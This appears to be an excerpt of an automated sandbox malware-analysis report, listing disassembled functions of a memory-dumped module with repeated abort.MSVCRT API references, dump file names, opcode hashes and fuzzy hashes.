abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 6724007e7ac154447a32ad26229acdc3b6936e8f062b749440e59ab7c9af0870
Instruction ID: 8f04fe715e74164d2005bb421769462e274bb96837b9802aef84f5be4b4e5a43
Opcode Fuzzy Hash: 6724007e7ac154447a32ad26229acdc3b6936e8f062b749440e59ab7c9af0870
Instruction Fuzzy Hash: 51312430249B08DFC7108E5AC691356BBA5FB87314F44893AEE5A87F42D334BC14EB90

Function 6C76BFCC Relevance: 39.1, APIs: 26, Instructions: 63COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction ID: 546ae99cea206064bca6512e101edb1fb0ef780e94668f9c38595cd398e5555b
Opcode Fuzzy Hash: ed9e904bdc960e0274c863daabe7c540bf0483139fdd577b2139e1be0fdb7577
Instruction Fuzzy Hash: 60F027305CD03ECB8F242A6F87144A1737377A730DBAA2C62EC886BE28C211A407C381

Function 6C76BEE7 Relevance: 37.6, APIs: 25, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5315d90007812713eedd299baa5c9c93dff28f293bcf6b71b06d04bb6f753ac
Instruction ID: 815c7557814c9642a193e26ac9093c8b985bdeccf6af2fb63301fe58a54ed3c2
Opcode Fuzzy Hash: a5315d90007812713eedd299baa5c9c93dff28f293bcf6b71b06d04bb6f753ac
Instruction Fuzzy Hash: A101B173A4662507D7104E76C5D1351B7A17B83318F198679DC7517E9AC534B808F780

Function 6C76BC1B Relevance: 37.6, APIs: 25, Instructions: 55COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction ID: 2c0207134675f578fdcc51fce4b47d2ca6750638dac93bfd799dcf450c498b70
Opcode Fuzzy Hash: 77b11931abd096bc3338c5977b156239d319a097d063f506d711946b206ded35
Instruction Fuzzy Hash: ADE0863368B32D4789206DEDB6440AAB364BB53359F222C29D90CA3D01D742E808C2C2

Function 6C76BE70 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction ID: 8ba626f189a7146e051261ac68e8d2c3aab2e19acf1c7b655764ffb918961196
Opcode Fuzzy Hash: 2752d643918e1e1032e991af4b8656a5a6dc123bbfd1704150af43cc30d29a6a
Instruction Fuzzy Hash: F6D0173018A709CF8B10EF59D29C8A9B7F5BB4B305B02AD79C80997F20D632D808CA51

Function 6C76BE00 Relevance: 37.5, APIs: 25, Instructions: 46COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction ID: b99ebaeaffeb6f80aea925c213c120d3d4420adc818ed7067dc26d9984fb512e
Opcode Fuzzy Hash: f1bdf92fe784dd716450a381fcbe393cc49dbea88f7ca8833756bdcf582f8442
Instruction Fuzzy Hash: E7D05E3058E12B8B8F045E6D829C8A9F3B57B5630872A6CA4D409E3E05DA21EA098604

Function 6C76BDC7 Relevance: 37.5, APIs: 25, Instructions: 44COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction ID: 7cb11f53b3ed9a457eeb5daad544a6d91b3d645bf42f5311b0910b0f6f59a4cf
Opcode Fuzzy Hash: 2018c9856225a1e0aff8a6428b538321e9f063033382905ac13f326accea8504
Instruction Fuzzy Hash: 0FC012219CB32D8BC9202DA95258366F2B4BB17305F233C288C4973E008B51F808C595

Function 6C76BE98 Relevance: 37.5, APIs: 25, Instructions: 43COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D56
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D5B
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D60
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D65
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6A
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D6F
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D74
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D79
abort.MSVCRT(?,?,00000000,00000000,?,7622E010,6C77038F), ref: 6C836D7E

Memory Dump Source

Source File: 00000004.00000002.3472672650.000000006C761000.00000020.00000001.01000000.00000006.sdmp, Offset: 6C760000, based on PE: true

Associated: 00000004.00000002.3472649354.000000006C760000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472802130.000000006C83D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3472818152.000000006C83F000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473026407.000000006C888000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473051311.000000006C889000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000004.00000002.3473074482.000000006C88C000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_6c760000_service123.jbxd

Similarity

API ID: abort
String ID:
API String ID: 4206212132-0
Opcode ID: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction ID: 7de1baa775d5a70a40b9fc8e6b1ca7a5d004659e60cff17e94360b5abb54011d
Opcode Fuzzy Hash: bc52ccfba1c464a848b42941d0ab8aaff6de37609b708ea6479571ad4f8441ac
Instruction Fuzzy Hash: B4C0123568B229CB8A20AE9992584A9B374BB6B304F123C64D805B3F048760F408C591

Function 6C76BDE8 Relevance: 37.5, APIs: 25, Instructions: 42COMMON

Download Yara Rule

APIs

abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D03
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D08
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D0D
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D12
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D17
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D1C
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D21
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D26
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D2B
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D30
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D35
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3A
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D3F
abort.MSVCRT(?,?,?,?,00000001,?,6C76C5DB), ref: 6C836D44
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D4C
abort.MSVCRT(?,?,?,?,?,?,6C76E2F4,?,?,?,?,?,?,00000000,00000001,6C77008D), ref: 6C836D51
